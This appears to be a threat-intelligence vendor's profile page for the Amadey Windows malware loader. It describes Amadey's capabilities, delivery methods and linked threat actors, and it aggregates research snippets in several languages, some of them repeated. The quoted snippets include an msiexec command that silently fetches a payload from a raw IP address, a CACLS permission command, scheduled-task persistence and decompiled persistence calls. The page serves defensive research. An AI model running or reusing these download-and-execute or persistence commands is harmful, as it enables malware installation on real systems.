Amadey is a Windows bot and malware loader first observed in 2018. It profiles infected systems, including usernames, host and operating-system characteristics, administrative context, and installed security products; communicates with command-and-control infrastructure; and downloads and executes additional payloads. It has been widely used as an initial-access and payload-delivery platform for information stealers, remote-access tools, proxy malware, and ransomware. Amadey variants have also incorporated credential-stealing plugins capable of harvesting browser, Outlook, MikroTik, and cryptocurrency-wallet data, as well as clipboard-hijacking functionality intended to substitute cryptocurrency payment addresses. Persistence mechanisms observed across variants include scheduled tasks and Startup-folder configuration. The malware has been delivered through phishing, malicious documents, fraudulent software and gaming-cheat downloads, pirated software bundles, and exploit-based campaigns. Amadey has been used in financially motivated operations, including activity associated with TA505 and LockBit-related intrusions. Its command-and-control communications have used HTTP in some variants and RC4-encrypted binary data represented as hexadecimal strings in more recent observed activity.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
We have also seen instances of Amaday C&C servers recently that are actively pushing DoublePulsar backdoor and EternalBlue exploit payloads on the victim machine. | One such threat we've kept an eye on is Amadey, a bot of Russian origin, which was first seen in late 2018. Once on a victim's machine, Amadey sends user data to a Command and Control (C&C) server and executes other tasks sent back by the C&C server.
9 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Un lien similaire a aussi été constaté par le CERT sud-coréen entre une souche du rançongiciel et une souche du code Amadey qui, bien que vendu sur certains forum d’attaquants, est aussi utilisé par TA505.
TA406 has used many different malware families, including KONNI, SANNY, CARROTBAT/CARROTBALL, BabyShark, Amadey and Android Moez.
The Amadey bot is a Trojan that was first discovered in 2018 and is used to steal sensitive information from the infected device.
During our analysis of the ROKRAT infection chain, we came across a similar chain leading to the deployment of Amadey, a commercial RAT sold in underground forums.
During our analysis of the ROKRAT infection chain, we came across a similar chain leading to the deployment of Amadey, a commercial RAT sold in underground forums.
Il dépose entre 40 et 50 exécutables ... et installe simultanément plusieurs familles de malwares : Amadey (loader/bot)
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Process 4192 runs a command that will start a scheduled task called “GoogleUpdateTaskMachineQC” using schtasks... (T1053.005 – Scheduled Task/Job: Scheduled Task).
It gets the permission to read, write, and execute files using the command: /k echo Y|CACLS
Excel 4.0 Macro Utilized by TA505 to Target Financial Institutions Recently
Its primary infection vectors have been reported to include phishing emails, bundling with pirated software, and distribution via exploits.
Process 4192 runs a command that will start a scheduled task called “GoogleUpdateTaskMachineQC” using schtasks... (T1053.005 – Scheduled Task/Job: Scheduled Task).
Process 4192 runs a command that will start a scheduled task called “GoogleUpdateTaskMachineQC” using schtasks... (T1053.005 – Scheduled Task/Job: Scheduled Task).
This article will cover the the string encryption in Amadey 1.09, and will provide a step-by-step guide to create an automatic string decryption script in Java.
主な感染経路としてフィッシングメール、海賊版のソフトウェアへのバンドル、エクスプロイト経由で配布されることが報告されています。
pcVar1 = __Z12aGetSelfPathv ( ) ; __Z13aDropToSystemPc ( pcVar1 ) ; pcVar1 = __Z19aGetSelfDestinationi ( 0 ) ; __Z11aAutoRunSetPc ( pcVar1 ) ;
The goal of the script is to automatically decrypt the encrypted strings that are present within the binary.
The download URL is as follows: msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%'
Following this, it creates a mutex to make sure only one instance of the bot is running in the system at one point.
Another addition is the parsing of Outlook profiles from registry in order to harvest account data
The content repeatedly describes malware and threat actors collecting the username, identifying the current user, enumerating logged-on users, or running commands such as whoami, query user, and quser to determine user context on compromised systems.
Amadey is responsible for collecting information from infected machines, conducting C2 communications, and retrieving and executing additional payloads... As of 2026, the Amadey C2 communication that we have been able to confirm operates by encrypting binary data with an RC4 key, converting it into a hexadecimal string, and exchanging it in that form.
1,107 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Loader used as a delivery mechanism for VectraRAT in the observed campaigns.
Loader used in observed delivery campaigns to deploy VectraRAT.
A loader used by a VectraRAT buyer as a second-stage delivery mechanism to download VectraRAT to already compromised hosts.
Amadey is referenced as the payload/campaign example in a multi-stage, fileless-leaning delivery chain using HTA, mshta.exe, PowerShell, Base64 obfuscation, and C2 retrieval.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.